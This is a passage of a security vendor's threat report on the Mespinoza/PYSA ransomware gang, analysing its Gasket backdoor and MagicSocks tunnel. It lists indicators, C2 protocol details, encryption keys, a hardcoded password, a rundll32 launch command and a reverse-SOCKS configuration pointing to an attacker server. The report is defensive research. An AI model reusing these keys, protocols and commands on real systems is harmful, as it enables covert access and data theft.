{ "id": "f4b204dc-0d2c-4e45-9fb0-86f526c72452", "created_at": "2026-04-06T00:08:14.909567Z", "updated_at": "2026-04-10T03:19:59.189818Z", "deleted_at": null, "sha1_hash": "dbcc4e49360b245b8cbdfe54aed9bda18ce879a1", "title": "Mespinoza Ransomware Gang Calls Victims “Partners,” Attacks with Gasket, \"MagicSocks\" Tools", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2409916, "plain_text": "Mespinoza Ransomware Gang Calls Victims “Partners,” Attacks with\r\nGasket, \"MagicSocks\" Tools\r\nBy Robert Falcone, Alex Hinchliffe, Quinn Cooke\r\nPublished: 2021-07-15 · Archived: 2026-04-05 13:50:59 UTC\r\nExecutive Summary\r\nAs cyber extortion flourishes, ransomware gangs are constantly changing tactics and business models to increase the\r\nchances that victims will pay increasingly large ransoms. As these criminal organizations become more sophisticated, they\r\nare increasingly taking on the appearance of professional enterprises. One good example is Mespinoza ransomware, which is\r\nrun by a prolific group with a penchant for using whimsical terms to name its hacking tools.\r\nOur Unit 42 cybersecurity consultants have observed the gang attacking U.S. publishing, real estate, industrial\r\nmanufacturing and education organizations with ransom demands as high as $1.6 million and payments as high as $470,000.\r\nThe FBI recently published an alert about the group, also known as PYSA, following a hacking spree on K-12 schools,\r\ncolleges, universities and even seminaries in the United States, as well as the United Kingdom.\r\nTo learn more about this group, we monitored its infrastructure — including a command and control (C2) server it uses to\r\nmanage attacks and a leak site where it posts data of victims who refused to pay large ransoms. Here are some our our key\r\nfindings on the Mespinoza gang:\r\nExtremely Disciplined: After accessing a new network, the group studies compromised systems in what we believe is triage\r\nto determine whether there’s enough valuable data to justify launching a full-scale attack. They look for keywords including\r\nclandestine, fraud, ssn, driver*license, passport and I-9. That suggests they are hunting for sensitive files that would have the\r\nmost impact if leaked.\r\nTargets Many Industries: Victim organizations are referred to as “partners.” Use of that term suggests that they try to run\r\nthe group as a professional enterprise and see victims as business partners who fund their profits. The gang’s leak site\r\nprovided data it claims belong to 187 victim organizations in industries including education, manufacturing, retail, medical,\r\ngovernment, high tech, transportation and logistics, engineering and social services, among others.\r\nHas Global Reach: 55 percent of victims identified on the leak site are in the United States. The rest are scattered across the\r\nglobe in more than 20 countries including Canada, Brazil, United Kingdom, Italy, Spain, France, Germany, South Africa and\r\nAustralia.\r\nIs Cocky When Approaching Victims: A ransom note offers this advice: “What to tell my boss?” “Protect Your System,\r\nAmigo.”\r\nUses Attack Tools with Creative Names: A tool that creates network tunnels to siphon off data is called “MagicSocks.” A\r\ncomponent stored on their staging server and likely used to wrap up an attack is named “HappyEnd.bat.”\r\nPalo Alto Networks Next-Generation Firewall customers are protected from this threat with DNS Security, Threat\r\nPrevention, Advanced URL Filtering and WildFire security subscriptions. Customers are also protected with Cortex XDR\r\nand can use AutoFocus for tracking related entities. Cortex Xpanse customers can assess and manage their network security\r\nattack surface and inventory their systems. Full visualization of the techniques observed and their relevant courses of action\r\ncan be viewed in the Unit 42 ATOM Viewer.\r\nAccessing Networks via RDP\r\nWe’ve responded to incidents where the ransomware operators use Remote Desktop Protocol (RDP) to access the impacted\r\norganization’s network and make use of various open-source and built-in system tools to aid lateral movement and credential\r\ngathering. The operators leverage double-extortion tactics — exfiltrating data prior to deploying the ransomware so they can\r\nlater threaten to leak it — and install a new backdoor, we call Gasket, (based on the malware’s code) to maintain access to\r\nthe network. Gasket also references a capability called “MagicSocks,” which uses the open-source Chisel project to create\r\ntunnels for continued remote access to the network.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 1 of 23\n\nWe’ve observed the Mespinoza ransomware gang exfiltrating files to a remote server whose filenames match a list of\r\nkeywords prior to installing the ransomware via a PowerShell script. The keywords include the sub-strings “secret,” “fraud”\r\nand “SWIFT.”, which suggests the actors sought to gather and exfiltrate sensitive files that would have the most impact on\r\nthe organization if the actors released the files to the public. At the time of this writing, the gang’s leak site named and\r\nprovided information on 187 organizations in various industries globally.\r\nFigure 1. Mespinoza victimology by country.\r\nFigure 2. Mespinoza victimology by industry.\r\nIn many of the descriptions, the actor refers to the impacted organization as their “partner.” We suspect that Mespinoza uses\r\nthe term because they view their operations as a professional enterprise and their “partners” as business partners funding\r\ntheir business.\r\nThe Gasket and MagicSocks tools, as well as the exfiltrated data on the leaked site, date back to April 2020, which suggests\r\nthe Mespinoza ransomware gang has been active for more than a year. While there are reports suggesting that the Mespinoza\r\nransomware gang has adopted a Ransomware-as-a-Service (RaaS) model, we have not observed this behavior from the\r\ngroup based on the ransomware cases we’ve investigated.\r\nGasket\r\nDuring our analysis of a Mespinoza ransomware incident, we observed the threat actors installing a backdoor written in the\r\nGo language on the system prior to the distribution of the ransomware. According to a report published by France’s National\r\nAgency for the Security of Information Systems (ANSSI), ANSSI also observed threat actors delivering the Mespinoza\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 2 of 23\n\nransomware using a payload written in Go. We analyzed the Go sample mentioned in the ANSSI report and found that it was\r\nan earlier and an unobfuscated version of the same tool we observed in our case.\r\nThe developers of Gasket wrote this backdoor in Golang and used the open-source Gobfuscate tool to obfuscate the payload.\r\nWe call this tool Gasket, as the variant of this tool mentioned in the ANSSI report (SHA256:\r\n9986b6881fc1df8f119a6ed693a7858c606aed291b0b2f2b3d9ed866337bdbde) designated as version “001,” which had the\r\nfollowing two functions that it called to carry out its command and control (c2) communications:\r\nmain.checkGasket\r\nmain.connectGasket\r\nWe believe that the actors use this backdoor as a backup to RDP to maintain access to the network.\r\nGasket parses the command line arguments passed to it to determine whether it should run as a standalone process (no\r\ndaemon mode), install itself as a service (daemon mode, no command line arguments) or to control a previously installed\r\nGasket service. Gasket supports the following command line arguments:\r\nno-persist\r\nservice Restart|Install|Start|Run\r\nWhen attempting to install itself as a daemon, Gasket will create a service and run its functional code. The following service\r\nnames have been extracted from the known Gasket samples:\r\nAzureAgentController\r\nCorpNativeHostDebugger\r\nDefenderSecurityAgent\r\nGetServiceController\r\nJavaJDBC\r\nMicrosoftSecurityManager\r\nMicrosoftTeamConnect\r\nMicrosoftTeamConnectDebugger\r\nMicrosoftTeamManager\r\nMsStudioAgentUpdateService\r\nWindowsHealthSubSystem\r\nWindowsManagementSystem\r\nWindowsProtectionSystem\r\nWindowsSoftwareManager\r\nWindowsSoftwareManagerDebugger\r\nCommand and Control\r\nA majority of versions of Gasket come equipped with a primary C2 communication channel, as well as a second fallback\r\nchannel. Early versions of Gasket relied only on HTTP-based C2 communications using IP addresses for its servers, while\r\nlater versions use the same HTTP-based C2 channel as a fallback and rely mainly on a DNS tunneling C2 channel. The DNS\r\ntunneling protocol uses DNS TXT queries and is based on an open source project called Chashell. For instance, the\r\nfollowing DNS TXT query was issued by Gasket:\r\n98ca192722ba28e9b8fb34b0d789a00608a13aac2e8d5b420b8e2ae899777a4.5c91a5a50ca31d47ed0d1dbbd0b7d0633b8f80d00eae16b6b1e6e326\r\nTo understand the outbound DNS queries issued by Gasket, we analyzed Chashell’s server to determine how it processes the\r\ninbound DNS queries and to understand how the server constructs its responses. The Chashell C2 server will take the\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 3 of 23\n\nsubdomain up to the fully qualified domain name for the C2 (transnet[.]wiki from above) and join the subdomain labels\r\ntogether without the periods removed. The server then decrypts the resulting data using XSalsa20 and Poly1305, of which\r\nthe cleartext is treated as a serialized protobuf message. All Gasket samples that use the DNS tunneling C2 channel-based on\r\nChashell use a unique key of 37c3cb07b37d43721b3a8171959d2dff11ff904b048a334012239be9c7b87f63 to decrypt the\r\ndata transferred.\r\nAccording to Chashell's GitHub, the chacomm.proto file describes the protobuf message structure that the server will use to\r\nparse the decrypted data received by Gasket and how it will structure its response. The structure of the message includes a\r\nclientguid field that is a GUID unique to the compromised host and either a ChunkStart, ChunkData, PollQuery or\r\nInfoPacket packet type. The structure of each packet type varies, but the following table describes each packet type's\r\npurpose:\r\nPacket\r\nType\r\nDescription\r\nInfoPacket Initial beacon that provides the compromised system's hostname to the C2.\r\nChunkStart Provides a chunk identifier and tells the C2 how many DNS queries will be required to send the data.\r\nChunkData\r\nIncludes the chunk identifier, the current chunk and the data, so the C2 can reconstruct the uploaded\r\ndata.\r\nPollQuery Acts as a heartbeat to keep the session alive, but is also used as the query type to get data from the C2.\r\nTable 1. Description of Chashell's different packet types.\r\nThe C2 will respond to these queries with hexadecimal formatted data within the TXT answer, which is a serialized protobuf\r\nthat uses the same message structure from Chashell’s chacomm.proto file. The following example shows the DNS requests\r\nand responses and the contents of the messages necessary to send data from the Chashell server to the Gasket payload via\r\nthe DNS tunneling C2 channel:\r\nFigure 3. Example DNS request and response flow of Chashell.\r\nUnfortunately, Gasket would not run the hostname data provided via the Chashell server above as a command, as there’s a\r\nsub-protocol and a command handler used by Gasket to determine how to handle the server’s response, which we will\r\ndiscuss in the next section. Gasket also uses a sub-protocol in addition to Chashell's DNS tunneling protocol for its DNS\r\nrequests, which prepends a message type followed by encrypted data to notify the C2 of the type of message. This suggests\r\nthat the actors had modified the Chashell server code to support this modified communication channel. The following\r\nmessage types are available:\r\nMessage\r\nType\r\nDescription\r\n1\r\nInitial check-in structured as \u003cversion number\u003e///\u003cencoded computer and user name\u003e///\u003ccomputer\r\nname\u003e///\u003cuser name\u003e\r\n2 Heart-beat \u003cversion number\u003e///\u003cencoded computer and user name\u003e\r\n9 Data sent including output and debug messages\r\nTable 2. Description of Chashell's different packet types.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 4 of 23\n\nAs previously mentioned, many Gasket versions also have an HTTP-based backup C2 channel that it will use if the domains\r\nused in the DNS tunneling channel are inaccessible. The payload will issue HTTP requests directly to IP addresses, which\r\ndoes not require any DNS requests to operate. To support this backup channel, the payload includes a list of IP addresses\r\nthat it has hardcoded into a four two-byte binary format that the payload decodes by subtracting 10 from each two-byte and\r\nuses the result to create the dot notation IP address. For instance, the bytes 37 00 9D 00 EF 00 27 00 in the binary would\r\nresult in a list of 0x37, 0x9d, 0xef and 0x27, each of which have 10 subtracted from them to produce 0x2d, 0x93, 0xe5 and\r\n0x1d, which results in 45, 147, 229 and 29. These values are then joined with a \".\" character to make the dot notation IP of\r\n45.147.229[.]29. A full list of known HTTP-based Gasket C2 servers is available in Table 5, as well as the Indicators of\r\nCompromise (IOCs) section of this blog.\r\nThe initial beacon sent via the HTTP C2 channel involves a POST request to the URL /cert/trust. The POST request uses the\r\ndefault Go-http-client/1.1 user-agent and includes encrypted data that will look like the following:\r\nFigure 4. Example Gasket initial beacon communication.\r\nThe data in the HTTP POST requests are encrypted with a rolling XOR algorithm, using the string dick as a key. The data\r\nwithin the initial beacon to /cert/trust contains a hardcoded version number 021, a unique identifier for the system (MD5\r\nhash or base64 encoded string), the computer name and user name delimited by /// as seen in the following:\r\n021///15c50b724a801417ef4143bb58b7178b///\u003ccomputer name\u003e///\u003cuser name\u003e\r\nAfter the initial beacon, Gasket sends supplemental requests to a URL of /time/sync to obtain commands from the threat\r\nactor, which will look like the following:\r\nFigure 5. Example Gasket supplemental requests.\r\nThese follow up requests to /time/sync use the same XOR algorithm and key and the resulting data includes just the first two\r\nfields, specifically:\r\n021///15c50b724a801417ef4143bb58b7178b\r\nFor versions that have remote logging capabilities, Gasket sends HTTP POST requests to a URL of /cert/dist that looks like\r\nthe following:\r\nFigure 6. Example Gasket remote logging requests.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 5 of 23\n\nThe remote logging request seen above uses the same XOR algorithm and key as in other HTTP requests. The structure of\r\nthe data differs slightly with the sent information, including the version number, the unique identifier for the system and\r\nfinally the message sent to the server as seen in the following example remote error log:\r\n002///\u003cbase64 username+computername\u003e///[Control]: Failed to Stop Windows Protection System: Unknown action Stop\r\nCapabilities\r\nThe response from the C2 server will provide /// delimited data that contains an integer that the payload will treat as a\r\ncommand, along with additional parameters for the commands. Table 3 below provides a list of available commands within\r\na majority of and the most recent (021) Gasket versions.\r\nCommand Description\r\n1 Runs a command/application/powershell with os.exec.Command.Run, returns stdout.\r\n2\r\nStarts a SOCKS5 server using the rsocks project (https://github.com/brimstone/rsocks) to connect to a\r\nspecified remote system.\r\n3 Same as command 2.\r\n4\r\nSwitches the C2 communications from DNS to HTTP or HTTP to DNS, depending on which channel was\r\ncurrently active.\r\n7\r\nUses the Chisel project to create what it calls a \"MagicSocks\" client to port forward and tunnel traffic to a\r\nprovided server using a provided username and 'networkZSA$789ty5' as a password for SSH.\r\n9\r\nUninstalls the Trojan by deleting the service running the payload, creating %temp%\\del.bat to delete\r\nitself and calling os.Exit\r\nTable 3. Commands available in Gasket version 021.\r\nBased on the commands in Table 3, it appears that Gasket serves the threat actors not only as a backdoor, but also provides\r\ntunneling abilities to allow the actor to use Gasket as a means to tunnel traffic through to an externally controlled server.\r\nGasket references \"magicSocks\" within its debug logs when creating its tunnel, which appears to be a tunneling method\r\nusing the 'chisel' project. We have evidence that this threat actor has a standalone version of this tunneling tool, which we\r\ncall MagicSocks and will discuss in the next section.\r\nEvolution of Gasket\r\nWe alluded to several versions of Gasket in previous sections of this blog, but we only referenced 001 and 021 specifically.\r\nThese two version numbers mark the oldest and newest known version of Gasket, of which we saw first back in April 2020\r\nall the way through March 2021. Table 4 provides a list of Gasket samples, their respective version number and the first\r\ntimestamp we have associated with the sample.\r\nFirst Seen SHA256 Version\r\n4/18/2020 b0629dcb1b95b7d7d65e1dad7549057c11b06600c319db494548c88ec690551e 001\r\n5/08/2020 356671767c368e455f2261f7f76d9ee9bd0b522172490845b89281224ab5dbad 001\r\n5/9/2020 a30e605fa404e3fcbfc50cb94482618add30f8d4dbd9b38ed595764760eb2e80 001\r\n5/13/2020 64b9b5874820ca26344c919b518d6c0599a991aaf1943a519da98d294bebf01f 001\r\n5/9/2020 ccfa2c14159a535ff1e5a42c5dcfb2a759a1f4b6a410028fd8b4640b4f7983c1 001\r\n7/23/2020 5d8459c2170c296288e2c0dd9a77f5d973b22213af8fa0d276a8794ffe8dc159 001\r\n10/7/2020 af97b35d9e30db252034129b7b3e4e6584d1268d00cde9654024ce460526f61e 001\r\n5/14/2021 1b888acb22a8326bd5f80f840390182d00e0c8db416d29d042358b48d1220438 001\r\n5/19/2020 0bcbc1faec0c44d157d5c8170be4764f290d34078516da5dcd8b5039ef54f5ca 002\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 6 of 23\n\n11/23/2020 ea3b35384e803bef3c02a8f27aea2c2a40f9a4d2726113e1c5f2bc3be9c41322 002\r\n8/31/2020 85c8ccf45cdb84e99cce74c376ce73fdf08fdd6d0a7809702e317c18a016b388 003\r\n10/13/2020 8b5cdbd315da292bbbeb9ff4e933c98f0e3de37b5b813e87a6b9796e10fbe9e8 003\r\n6/12/2020 701791cd5ed3e3b137dd121a0458977099bb194a4580f364802914483c72b3ce 006\r\n6/20/2020 ef31b968c71b0e21d9b0674e3200f5a6eb1ebf6700756d4515da7800c2ee6a0f 006\r\n9/04/2020 aa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586 006\r\n9/04/2020 140224fb7af2d235e9c5c758e8acaee34c912e62fad625442e5ca4102d11e9e7 006\r\n9/06/2020 d9c753b859414e4b38a0841423b159590c47ad580249b0cd3c99a0ecc6644914 006\r\n9/17/2020 d591f43fc34163c9adbcc98f51bb2771223cc78081e98839ca419e6efd711820 006\r\n9/25/2020 f8a5065eb53b1e3ac81748176f43dce1f9e06ea8db1ecfa38c146e8ea89fcc0b 006\r\n7/16/2020 12b927235ab1a5eb87222ef34e88d4aababe23804ae12dc0807ca6b256c7281c 007\r\n9/25/2020 045510eb6c86fc2d966aded8722f4c0e73690b5078771944ec1a842e50af4410 008\r\n10/08/2020 6eb0455b0ab3073c88fcba0cad92f73cc53459f94008e57100dc741c23cf41a3 009\r\n6/22/2020 f5cb94aa3e1a4a8b6d107d12081e0770e95f08a96f0fc4d5214e8226d71e7eb7 010\r\n10/08/2020 2697bbe0e96c801ff615a97c2258ac27eec015077df5222d52f3fbbcdca901f5 010\r\n7/16/2020 30bd30642bf83abd74b8b2312ea606e0f192b0d61351f1445d1a1458414992d3 011\r\n10/14/2020 3a6ddc4022f6abe7bdb95a3ba491aaf7f9713bcb6db1fbaa299f7c68ab04d4f4 011\r\n11/17/2020 c2ef84710937b622f35b2b8fab9f9aa86b718ba7bc77a40b33b92e40747676b5 012\r\n11/28/2020 7b5027bd231d8c62f70141fa4f50098d056009b46fa2fac16183d1321be04768 014\r\n01/07/2021 e47a632bfd08e72d15517170b06c2de140f5f237b2f370e12fbb3ad4ff75f649 016\r\n12/14/2020 8a9205709c6a1e5923c66b63addc1f833461df2c7e26d9176993f14de2a39d5b 018\r\n12/21/2020 6d1fde9a5963a672f5e4b35cc7b8eaa8520d830eb30c67fadf8ab82aeb28b81a 019\r\n3/22/2021 0fd13ece461511fbc129f6584d45fea920200116f41d6097e4dffeb965b19ef4 019\r\n3/10/2021 89b9ba56ebe73362ef83e7197f85f6480c1e85384ad0bc2a76505ba97a681010 020\r\n3/23/2021 c9bed25ab291953872c90126ce5283ce1ad5269ff8c1bca74a42468db7417045 021\r\nTable 4. Known Gasket samples and their respective versions.\r\nWe extracted the C2 locations used by Gasket samples for both the HTTP-based and DNS-based channels for analysis. The\r\nhardcoded domains and IP addresses, seen in Table 5, are not unique to the version of Gasket, as several domains and IPs\r\nwere used in Gasket samples that had different version numbers.\r\nVersion C2s\r\n001 185.183.96[.]147\r\n194.5.249[.]137\r\n194.5.249[.]138\r\n194.5.249[.]139\r\n194.5.250[.]151\r\n194.5.250[.]162\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 7 of 23\n\n194.5.250[.]216\r\n37.120.140[.]184\r\n37.221.113[.]66\r\naccounting-consult[.]xyz\r\nntservicepack[.]com\r\nstatistics-update[.]xyz\r\n002\r\n185.183.96[.]147\r\n194.5.250[.]216\r\n194.187.249[.]102\r\n194.187.249[.]138\r\n37.120.140[.]184\r\n37.221.113[.]66\r\n89.38.225[.]208\r\nntservicepack[.]com\r\nreportservicefuture[.]website\r\nsbvjhs[.]xyz\r\nsbvjhs[.]club\r\n003\r\n185.186.245[.]85\r\n193.239.84[.]205\r\n193.239.85[.]55\r\n194.187.249[.]102\r\n194.5.249[.]18\r\n194.5.249[.]180\r\n86.106.20[.]144\r\n89.38.225[.]208\r\nfirefox-search[.]xyz\r\nsbvjhs[.]club\r\nsbvjhs[.]xyz\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\n006 185.183.96[.]147\r\n194.187.249[.]102\r\n194.187.249[.]138\r\n194.5.250[.]216\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 8 of 23\n\n37.120.140[.]184\r\n37.120.140[.]247\r\n37.221.113[.]66\r\n86.106.20[.]144\r\n89.38.225[.]208\r\nntservicepack[.]com\r\nreportservicefuture[.]website\r\nsbvjhs[.]club\r\nsbvjhs[.]xyz\r\n007\r\nntservicepack[.]com\r\nreportservicefuture[.]website\r\n37.120.140[.]247\r\n194.5.250[.]216\r\n185.183.96[.]147\r\n008\r\nfirefox-search[.]xyz\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\n185.186.245[.]85\r\n193.239.85[.]55\r\n193.239.84[.]205\r\n194.187.249[.]102\r\n009\r\nfirefox-search[.]xyz\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\n185.186.245[.]85\r\n193.239.85[.]55\r\n193.239.84[.]205\r\n194.187.249[.]102\r\n010 185.185.27[.]3\r\n185.186.245[.]85\r\n193.239.84[.]205\r\n193.239.85[.]55\r\n194.187.249[.]102\r\n37.120.145[.]208\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 9 of 23\n\nblitzz[.]best\r\nfirefox-search[.]xyz\r\nspm[.]best\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\n011\r\nvisual-translator[.]xyz\r\nfirefox-search[.]xyz\r\nwiki-text[.]xyz\r\nsbvjhs[.]club\r\nspm[.]best\r\nblitzz[.]best\r\n185.186.245[.]85\r\n193.239.85[.]55\r\n193.239.84[.]205\r\n194.187.249[.]102\r\n45.89.175[.]239\r\n185.185.27[.]3\r\n37.120.145[.]208\r\n012\r\nenglishdict[.]xyz\r\nserchtext[.]xyz\r\n172.96.189[.]167\r\n89.41.26[.]173\r\n014\r\nenglishdict[.]xyz\r\nserchtext[.]xyz\r\n172.96.189[.]167\r\n89.41.26[.]173\r\n016\r\nenglishdialoge[.]xyz\r\nstarhouse[.]xyz\r\n160.20.147[.]184\r\n172.96.189[.]167\r\n193.239.84[.]205\r\n89.41.26[.]173\r\n018 englishdialoge[.]xyz\r\nstarhouse[.]xyz\r\n160.20.147[.]184\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 10 of 23\n\n172.96.189[.]167\r\n193.239.84[.]205\r\n89.41.26[.]173\r\n019\r\nenglish-breakfast[.]xyz\r\npump-online[.]xyz\r\n172.96.189[.]22\r\n172.96.189[.]246\r\n160.20.147[.]184\r\n172.96.189[.]167\r\n198.252.100[.]37\r\n020\r\ncvar99[.]xyz\r\ndowax[.]xyz\r\nenglish-breakfast[.]xyz\r\npump-online[.]xyz\r\n45.147.230[.]162\r\n45.147.230[.]212\r\n172.96.189[.]22\r\n172.96.189[.]246\r\n160.20.147[.]184\r\n172.96.189[.]167\r\n198.252.100[.]37\r\n021\r\ntransnet[.]wiki\r\ncvar99[.]xyz\r\nproductoccup[.]tech\r\nccenter[.]tech\r\ndowax[.]xyz\r\n45.147.229[.]29\r\n23.83.133[.]136\r\n45.147.228[.]49\r\n45.147.230[.]162\r\n45.147.230[.]212\r\nTable 5. C2 domains and IP addresses and their associated Gasket version.\r\nAs previously mentioned, we analyzed many Gasket backdoors and MagicSocks versions used by the threat actors and\r\ngathered a significant amount of related infrastructure for blocking and tracking purposes. The Maltego chart in Figure 7\r\nbelow helps to visualize the Gasket samples listed in Table 5 above, their versions and related infrastructure used for C2\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 11 of 23\n\ncommunications. Figure 7 below broadly shows two main clusters. On the left, showing more recent versions (012 to 021)\r\nand on the right showing pre-012 versions.\r\nThe vast majority of links between entities shown in Figure 7 are related to infrastructure, namely domain names and IP\r\naddresses that respective samples connected to during our WildFire sandbox analysis, or could connect to, based on\r\nextracted C2 configuration information.\r\nFigure 7. Maltego diagram showing Gasket and MicroSocks infrastructure and links.\r\nThe links between some of the distinct clusters (highlighted by squares drawn over Figure 7) are limited and typically\r\ninvolve C2 reuse. However, some additional links were possible using sample meta-data, such as common Windows Service\r\nnames, as previously listed.\r\nUsing the heatmap -- Figure 8 below -- we were able to further visualize the amount of reuse and overlap present for the\r\nprimary C2 address in all Gasket samples. Generally speaking, the table shows that earlier versions of Gasket reused C2\r\naddresses the most both for multiple variants of the same version and also for different variants using newer Gasket\r\nversions. The heatmap shows later versions -- from about 008 onwards -- have a reduction in reuse of primary C2 addresses\r\nwithin and across versions, and in the latest versions, it seems primary C2 addresses are not being reused.\r\nFigure 8. Heatmap showing Gasket sample counts and versions against primary C2s.\r\nThe outliers to this pattern are rows 9, 11 and 12 in Figure 8 above. Rows 9 and 11 relate to the top right cluster in Figure 7\r\nwhile row 12 relates to the bottom right cluster. They are outliers because the Gasket versions are relatively old yet their C2\r\nreuse is nonexistent. Furthermore, the links in Figure 7 from the cluster including C2s listed on rows 9 and 11 to the rest of\r\nthe Gasket mapping lies only with the fact that they are known Gasket samples, and they share the same Windows Service\r\nname as other samples from other clusters. We believe these outliers could be due to specific campaigns involving Gasket\r\nmalware with bespoke attack infrastructure.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 12 of 23\n\nWe see the most repetitive use of infrastructure in earlier versions of Gasket together with several changes to the name of the\r\nWindows Service created during infection. However, the latest Gasket versions, which appear to adopt more single-use and\r\nshort-lived infrastructure, (at least for their primary C2s) use a consistent name for the Windows Service, namely JavaJDBC.\r\nFigure 7 also highlights an area of overlap between Gasket and the MagicSocks tool via the common IP address\r\n89.44.9[.]229, which hosted both Gasket (SHA256:\r\naa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586), the MagicSocks sample (SHA256:\r\nd49a69be32744e0af32ad622aa22ba480d68253287c99f5a888feb9f2409e46f) and some PowerShell components related to\r\nMagicSocks. The PowerShell script hashes and additional C2 addresses extracted from other MagicSocks samples are listed\r\nin the IOCs section later.\r\nMagicSocks\r\nThe Gasket tool referenced a proxying and tunneling capability known as MagicSocks, which is based on the open-source\r\nChisel project. The actors also created a standalone version of MagicSocks that they would use in addition to Gasket. The\r\nstandalone MagicSocks tool comes as a dynamic link library (DLL), which the actor also wrote in Golang. The developer of\r\nMagicSocks uses code from the Chisel project to tunnel traffic from the local system to an external actor-controlled Chisel\r\nserver. The tool will build the string R:0.0.0.0:50000:socks that it supplies to the Chisel client code that will generate the\r\nfollowing JSON that the client uses as a configuration:\r\n{\"Version\":\"0.0.0-src\",\"Remotes\":\r\n[{\"LocalHost\":\"0.0.0.0\",\"LocalPort\":\"50000\",\"RemoteHost\":\"\",\"RemotePort\":\"\",\"Socks\":true,\"Reverse\":true}]}\r\nThe tool also builds a string that represents the external actor-controlled Chisel server, which is hosted at:\r\nhttp://creatordampfe[.]xyz:443\r\nWhen running the MagicSocks tool, MagicSocks uses the Chisel client to connect to the Chisel server hosted at\r\ncreatordampfe[.]xyz. This starts with an HTTP request and response that will look like the following:\r\nFigure 9. Example MagicSocks initial request and response.\r\nFigure 9. Example MagicSocks initial request and response.\r\nThe purpose of using Chisel is to tunnel traffic out from the local system to creatordampfe[.]xyz, which acts as a proxy to\r\nthe true location of the outbound traffic. Unfortunately, we do not have access to the Chisel server at creatordampfe[.]xyz to\r\ndetermine the ultimate destination of the traffic, which highlights the hiding functionality that MagicSocks offers the actors.\r\nWe discovered five additional MagicSocks standalone samples, all compiled between February 2021 and April 2021. We\r\nextracted the location of the remote Chisel server from each of the five samples and found the following three unique C2\r\nlocations:\r\n104.168.164[.]195\r\n172.96.189[.]86\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 13 of 23\n\n142.79.237[.]163\r\nThese samples were also obfuscated with Gobfuscate, but earlier compiled samples were compiled in the following location,\r\nwhich suggests they were created on a Linux system by a user, named solar:\r\n/home/solar/c/go/magic-dll/src/sokos/\r\nOne of the MagicSocks standalone samples we discovered was delivered with and executed by another tool with a filename\r\nof run64.exe (SHA256: f2dcad28330f500354eb37f33783af2bcc22d205e9c3805fed5e919c6853649c). This tool does nothing\r\nmore than run the MagicSocks DLL (timex.dll), specifically calling the Debug exported function by running the following\r\nrundll32 command:\r\nC:\\Windows\\System32\\rundll32.exe \u003ccurrent directory\u003e\\timex.dll,Debug\r\nWe believe the same individual created this sample as the MagicSocks samples, as the Go project's source was in the\r\nfollowing folder that has the same solar username:\r\n/home/solar/c/go/exec-dll/src/\r\nWe found another MagicSocks sample (SHA256:\r\nd49a69be32744e0af32ad622aa22ba480d68253287c99f5a888feb9f2409e46f) from September 2020, which was not\r\nobfuscated with Gobfuscate. This sample was hosted at 89.44.9[.]229/info.txt, which is the same IP that hosted the Gasket\r\nsample (SHA256: aa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586). This version of MagicSocks\r\nuses a socks5 library to create a proxy to a remote server, specifically 23.227.206[.]158:443. The 89.44.9[.]229 IP hosted\r\nother files of interest that we will discuss further in the related tools section of this blog.\r\nMespinoza Ransomware\r\nThe Gasket and MagicSocks tools were used in an attack that delivered the Mespinoza ransomware (also known as PYSA).\r\nAdditionally, based on analysis during incident response cases worked by Unit 42 consultants, other tools were discovered\r\nas used by the operators to facilitate latter parts of their attacks, as described below.\r\nFor general reconnaissance of the network after the RDP breach, \"ADRecon\" was used to enumerate Active Directory for\r\ndomains, users, groups, computers and more. Furthermore, built-in Windows utilities such as quser, ping and net were used,\r\ntogether with downloaded tools Advanced IP Scanner and Advanced Port Scanner, to gather more information about logged-on users and network topologies. PowerShell scripts were used to wake up systems turning them on over the network\r\nproviding the operators with additional targets.\r\nTo gather credentials and facilitate lateral movement, ransomware deployment, the operators used PowerShell to recursively\r\nsearch the file system for logon credentials stored in text files and spreadsheets. The PowerShell tool \"SessionGopher\",\r\ncapable of extracting session information from remote access tools, such as WinSCP, PuTTY, FileZilla and more, was also\r\nused enabling RDP and the Microsoft Sysinternals utility PsExec to allow lateral movement.\r\nThe operators also used PowerShell scripts to kill security services and backups, and disable features of Windows Defender\r\nby editing local group policies.\r\nThe ransomware is fairly straightforward, as it enumerates the file system and encrypts files with an asymmetric cipher,\r\nrenames the files with a specific extension and displays a ransom message. The ransom message contains three email\r\naddresses that victims would contact to discuss payment options for the actors to decrypt the encrypted files. In addition to\r\nproviding email addresses, the ransom message also includes the group’s leak site that the actors say they will post sensitive\r\nfiles that the actors stole from the network prior to encrypting the files. It appears that the group uses these potentially\r\nsensitive files to gain leverage in negotiating payment.\r\nExfiltration\r\nPrior to deploying Mespinoza, the actors run a PowerShell script that would exfiltrate potentially sensitive files from 